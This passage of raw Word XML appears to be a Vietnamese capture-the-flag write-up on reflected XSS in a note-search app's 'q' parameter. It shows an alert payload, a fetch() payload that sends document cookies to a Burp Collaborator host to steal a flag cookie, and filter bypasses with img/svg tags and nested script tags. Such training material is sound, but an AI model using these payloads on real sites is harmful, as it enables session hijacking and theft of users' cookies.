            <wp:docPr id="1202324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24310" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2249170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4498B654" w14:textId="6FE8B72D" w:rsidR="00E14E4D" w:rsidRDefault="00E14E4D" w:rsidP="000A7F0B">
      <w:r>
        <w:t>Bấm nút + để thêm node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979C2AC" w14:textId="2601F3AC" w:rsidR="00021C49" w:rsidRDefault="00B262DD" w:rsidP="00B262DD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B262DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33EDDAA9" wp14:editId="42912083">
            <wp:extent cx="4471670" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="15048061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06139" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId15"/>
                    <a:srcRect r="7948"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4472293" cy="1105054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D7112" w14:textId="14C89A6E" w:rsidR="00B262DD" w:rsidRDefault="0045189E" w:rsidP="00E12C5B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết quả trả về OK cho biết đã thành </w:t>
      </w:r>
      <w:r w:rsidR="00E12C5B">
        <w:t>công. Truy cập vào List note để xem danh sách note đã thêm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55929F" w14:textId="77777777" w:rsidR="00021C49" w:rsidRDefault="00021C49" w:rsidP="00B262DD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00021C49">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BE801D6" wp14:editId="57202A8F">
            <wp:extent cx="4425315" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="414275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75733" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId16"/>
                    <a:srcRect l="514" r="1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4425933" cy="1238423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9EEC6D" w14:textId="55E7991D" w:rsidR="00E12C5B" w:rsidRDefault="00E12C5B" w:rsidP="00E12C5B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp đó vào trường search nhập abc để tìm kiếm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63969C31" w14:textId="4EC1BD0E" w:rsidR="00021C49" w:rsidRDefault="00021C49" w:rsidP="00E12C5B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidR="0070276C" w:rsidRPr="0070276C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797E9DDF" wp14:editId="28793E6E">
            <wp:extent cx="5731510" cy="2148840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="999269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69064" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId17"/>
                    <a:srcRect t="32212"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2148840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D77C72" w14:textId="7718296E" w:rsidR="00E12C5B" w:rsidRDefault="000158F4" w:rsidP="000A7F0B">
      <w:r>
        <w:t xml:space="preserve">Giao diện web chuyển hướng </w:t>
      </w:r>
      <w:r w:rsidR="00925BAE">
        <w:t>đến search với param q là abc để tìm kiếm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A1485" w14:textId="65CDF9EC" w:rsidR="00021C49" w:rsidRDefault="0070276C" w:rsidP="00925BAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0070276C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F9C29B" wp14:editId="64D02F25">
            <wp:extent cx="5058481" cy="1038370"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1623611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11875" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5058481" cy="1038370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7E57E" w14:textId="63532470" w:rsidR="00925BAE" w:rsidRDefault="00925BAE" w:rsidP="00925BAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả đều hiện dòng thông báo không tim thấy với giá trị abc trong q được in lại hoàn toàn dù giá trị abc đã có trong notes. Điều này đúng như những gì code đã mô tả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75F2FF" w14:textId="6FAE4653" w:rsidR="00925BAE" w:rsidRPr="00B05004" w:rsidRDefault="00925BAE" w:rsidP="00C312F1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện tạo payload XSS đơn giản &lt;script&gt;alert()&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00C312F1">
        <w:t>và thực hiện tìm kiếm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FFFCE6" w14:textId="4A6EC61E" w:rsidR="000A7F0B" w:rsidRDefault="00B05004" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B05004">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16B33B0D" wp14:editId="318DA777">
            <wp:extent cx="5731510" cy="1759585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2025181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1993" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId19"/>
                    <a:srcRect t="37407"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1759585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4451C1" w14:textId="69BDC5D1" w:rsidR="00C312F1" w:rsidRDefault="00C312F1" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả cho thấy rằng payload XSS đã được thực thi thành công khiến cho cửa sổ popup đã được hiển thị trên giao diện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E13A275" w14:textId="52A7E85C" w:rsidR="006F7E90" w:rsidRDefault="006F7E90" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006F7E90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E89E1D3" wp14:editId="3009DE54">
            <wp:extent cx="5731510" cy="1350010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1718436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36686" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1350010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF6EB3" w14:textId="50CB9392" w:rsidR="001A0AEA" w:rsidRDefault="00666AE4" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiếp </w:t>
      </w:r>
      <w:r w:rsidR="00A348D2">
        <w:t xml:space="preserve"> theo </w:t>
      </w:r>
      <w:r w:rsidR="001447EE">
        <w:t xml:space="preserve">thực hiện lấy cookie của người dùng bằng cách thay thể payload </w:t>
      </w:r>
      <w:r w:rsidR="00E508E7">
        <w:t xml:space="preserve">thành từ alert() </w:t>
      </w:r>
      <w:r w:rsidR="001447EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0AEA" w:rsidRPr="001A0AEA">
        <w:t>&lt;script&gt;fetch("http://q5wicze2f35ergm29rwu1ptz3q9hxalz.oastify.com/?x="+document.</w:t>
      </w:r>
      <w:r w:rsidR="00E508E7">
        <w:t>cooke</w:t>
      </w:r>
      <w:r w:rsidR="001A0AEA" w:rsidRPr="001A0AEA">
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="001447EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E508E7">
        <w:t xml:space="preserve">với url là </w:t>
      </w:r>
      <w:r w:rsidR="00F75865">
        <w:t>Burp Collaborator</w:t>
      </w:r>
      <w:r w:rsidR="00E508E7">
        <w:t xml:space="preserve"> của mình để lấy gói tin được gọi tới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B7311" w14:textId="77777777" w:rsidR="001A0AEA" w:rsidRDefault="001A0AEA">
      <w:r w:rsidRPr="001A0AEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA656FB" wp14:editId="5C77F501">
            <wp:extent cx="5731510" cy="448945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="34792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25137" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="448945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F07912" w14:textId="07C55AE7" w:rsidR="00E508E7" w:rsidRDefault="00E508E7">
      <w:r>
        <w:t xml:space="preserve">Sau đó truy cập vào </w:t>
      </w:r>
      <w:r w:rsidR="00F75865">
        <w:t>Burp Collaborator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và thành công lấy được cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6205DD4F" w14:textId="77777777" w:rsidR="00666AE4" w:rsidRDefault="001A0AEA">
      <w:r w:rsidRPr="001A0AEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5889DF03" wp14:editId="248F7F22">
            <wp:extent cx="5731510" cy="1173480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="113136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6299" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1173480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17198C55" w14:textId="271C0421" w:rsidR="00E508E7" w:rsidRDefault="00E508E7">
      <w:r>
        <w:t>Tương tự thực hiện trực tiếp trên lab và lấy được cookie của người dùng chứa flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28584B37" w14:textId="0A98C09D" w:rsidR="00CE3787" w:rsidRDefault="00666AE4">
      <w:r w:rsidRPr="00666AE4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2121ED2D" wp14:editId="7950538B">
            <wp:extent cx="5731510" cy="1813560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="312562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62320" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1813560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CE3787">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8910FF" w14:textId="1D2C34BE" w:rsidR="00CE3787" w:rsidRPr="00FF23DE" w:rsidRDefault="00CE3787" w:rsidP="00CE3787">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2CE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145DE6FF" w14:textId="77777777" w:rsidR="00CE3787" w:rsidRPr="00FF23DE" w:rsidRDefault="00CE3787" w:rsidP="00CE3787">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8E43EE" w:rsidRPr="008E43EE" w14:paraId="42774A94" w14:textId="77777777" w:rsidTr="008E43EE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA9A901" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC55266" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F6CE05" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="484A9425" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702232B8" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B00B088" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14813CA2" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CFFC3A1" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B00DAD8" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>router.get('/search', function (req, res, next) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD864C4" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t xml:space="preserve">    // Sử dụng regex để replace &lt;script&gt; tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A9E73F1" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t xml:space="preserve">    // Flag g: dùng để match tất cả ký tự trong mẫu tìm kiếm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD2BBFE" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t xml:space="preserve">    // Flag i: case insensitve không phân biệt chữ hoa chữ thường</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E82D824" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t xml:space="preserve">    sanitized_q = req.query.q.replace(/&lt;script&gt;|&lt;\/script&gt;/gi, "");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CAAA0E4" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t xml:space="preserve">    html = 'Your search - &lt;b&gt;' + sanitized_q + '&lt;/b&gt; - did not match any notes.&lt;br&gt;&lt;br&gt;'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58EB0D10" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t xml:space="preserve">    res.send(html);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C610E88" w14:textId="77777777" w:rsidR="008E43EE" w:rsidRPr="008E43EE" w:rsidRDefault="008E43EE" w:rsidP="008E43EE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6370594A" w14:textId="05615746" w:rsidR="00CE3787" w:rsidRDefault="00A3783F" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A3783F">
        <w:t>Ở level 2, đoạn code đã được nâng cấp bằng cách bổ sung một bước lọc đơn giản nhằm loại bỏ thẻ &lt;script&gt; khỏi tham số q trước khi phản hồi lại cho người dùng. Tuy nhiên, cơ chế lọc này chỉ dừng ở mức xoá đúng chuỗi &lt;script&gt; và &lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00C14158">
        <w:t xml:space="preserve"> 1 lần</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3783F">
        <w:t xml:space="preserve"> bằng regex, hoàn toàn không xử lý các dạng payload XSS khác cũng như không mã hóa đầu ra.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3783F">
        <w:t xml:space="preserve">Do đó, dù đã có sự “nâng cấp”, ứng dụng vẫn dễ dàng bị khai thác XSS thông qua các thẻ HTML khác </w:t>
      </w:r>
      <w:r w:rsidR="00C14158">
        <w:t xml:space="preserve">cùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3783F">
        <w:t xml:space="preserve">các thuộc tính sự </w:t>
      </w:r>
      <w:r>
        <w:t>kiện</w:t>
      </w:r>
      <w:r w:rsidR="00C14158">
        <w:t xml:space="preserve"> hoặc là lồng 2 lần giá trị bị regex</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EDA41D" w14:textId="77777777" w:rsidR="00DA21B6" w:rsidRPr="00CF619D" w:rsidRDefault="00DA21B6" w:rsidP="00DA21B6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BDA6C2" w14:textId="0FB65696" w:rsidR="00DA21B6" w:rsidRPr="0089215E" w:rsidRDefault="00BB6E11" w:rsidP="00DA21B6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6E11">
        <w:t xml:space="preserve">hèn một payload XSS không sử dụng thẻ &lt;script&gt; vào trường tìm kiếm (search) </w:t>
      </w:r>
      <w:r w:rsidR="0089215E">
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
      <w:r w:rsidR="00C640B4">
        <w:t xml:space="preserve">sử dụng chèn 2 thẻ script lồng nhau </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6E11">
        <w:t>là có thể thực thi JavaScript trên trình duyệt người dùng.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ví dụ thẻ img, svg, </w:t>
      </w:r>
      <w:r w:rsidR="00C640B4">
        <w:t>&lt;scr&lt;script&gt;ipt&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3191F" w14:textId="77777777" w:rsidR="00DA21B6" w:rsidRDefault="00DA21B6" w:rsidP="00DA21B6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
